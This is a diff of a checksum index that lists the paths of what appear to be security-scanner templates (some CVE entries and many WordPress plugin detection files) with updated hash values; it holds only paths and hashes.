-http/cves/2021/CVE-2021-32819.yaml:8b8c5517f8c81a61b1b2be04d5c9517a63f21af2 +http/cves/2021/CVE-2021-32819.yaml:017cdc0de8f6be1809a71ffb409738d016a1e25e http/cves/2021/CVE-2021-32820.yaml:0faf5402e6aee088e31f4b695fc1d1d59eefca32 http/cves/2021/CVE-2021-32853.yaml:e8d62110f9ec97b7f4c06e70081581e5a8c8c312 http/cves/2021/CVE-2021-3293.yaml:e56df85ba08cbc27a866d9b75cd75ce1c7e57b9a @@ -5797,217 +5798,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 +http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f +http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b +http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f +http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 +http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 -http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 -http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c -http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 -http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e -http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a -http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f -http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 -http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 -http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad -http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f -http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 -http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af -http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a -http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff +http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a +http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e +http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f +http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af +http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb +http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e +http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 +http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 +http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 +http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 +http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a +http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 +http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab -http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 -http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 -http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e -http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba -http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d -http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 -http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 -http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca -http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:084d783cf9aa3011d022dc95b4e5ac20e48ea1f3 -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:dee7755fce70b6704235ecc3b81c8b5c109b0053 -http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 -http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc -http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 +http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 +http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb +http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 +http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f +http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 +http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 +http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 +http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 +http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d +http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b +http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b +http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 -http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 -http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 -http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 -http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 -http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 -http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b -http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f -http/technologies/wordpress/plugins/jetpack-boost.yaml:5344e84ef6d9c77864a3b4b68bfe1d966436d391 -http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde -http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a -http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac -http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 -http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 -http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b -http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 -http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 -http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 -http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb -http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 -http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 -http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd -http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb -http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 -http/technologies/wordpress/plugins/ml-slider.yaml:7c2b57d5255ea5e2cc0ee747502fb24949f46015 -http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf -http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 -http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 -http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af -http/technologies/wordpress/plugins/otter-blocks.yaml:a78a532c8c365f7d5389a154c72ffab4a9e198f9 -http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 -http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 +http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 +http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb +http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c +http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 +http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 +http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b +http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 +http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 +http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e +http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c +http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 +http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 +http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 +http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 +http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea +http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d +http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd +http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f +http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 +http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 +http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e +http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 +http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 +http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f +http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 +http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 +http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 +http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 +http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 +http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:b3da054b040050de221d3f85ad1e51d4f109472c -http/technologies/wordpress/plugins/polylang.yaml:fe96dc52452a9589f615f5c50a2a2d566408d24d -http/technologies/wordpress/plugins/popup-builder.yaml:b4c33fcfffe3b96d16f7e7c55a76a57223cfd988 -http/technologies/wordpress/plugins/popup-maker.yaml:e01af93b67f33cd260b458408dc505a8209b629e -http/technologies/wordpress/plugins/post-smtp.yaml:5b34a59d80a1257b18e38bf29177aa83b238f6b2 -http/technologies/wordpress/plugins/post-types-order.yaml:8db67ac7ec324b3d4800afe95f2c5b479fe0af82 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:ac0ee352c996bbeefc1d359b6147caf570f918f4 -http/technologies/wordpress/plugins/pretty-link.yaml:62549cdff64a91d536835fa1fea43109f0561156 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:435b8299f4b4b830f584ef2738d5ec570d709eb4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:8c3f228a961065c0ffc6ae288e522af0267ad147 -http/technologies/wordpress/plugins/redirection.yaml:d23e77de89ba863def13db88a8b6344d31b0ba19 -http/technologies/wordpress/plugins/redux-framework.yaml:45d721b643a269e7a6837b9a5d1d5fb22e29853b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:0d6a705e8fcae72c35d8d4b3ed8aa7f79980e8d8 -http/technologies/wordpress/plugins/safe-svg.yaml:a6a21aaef82c40ca2bcb59ce2e61718dd0e6af55 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3e08b5bdb1f3ec58dd08c620b7a9acc728913efd -http/technologies/wordpress/plugins/sg-cachepress.yaml:130f5809e4cf765690b79bcfda7bd132336e4b08 -http/technologies/wordpress/plugins/sg-security.yaml:6bbec86489b5c2eaf257315880bfc0c4fd4d464f -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:2529031f99ea27c92a54d847c15d77480847fdd7 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:d0ef637d9661f51b92339cabe9e3241c8ea9d6c6 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e8069c056b1dcc1dfbbc6ff7a561b9e4c76bc28a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 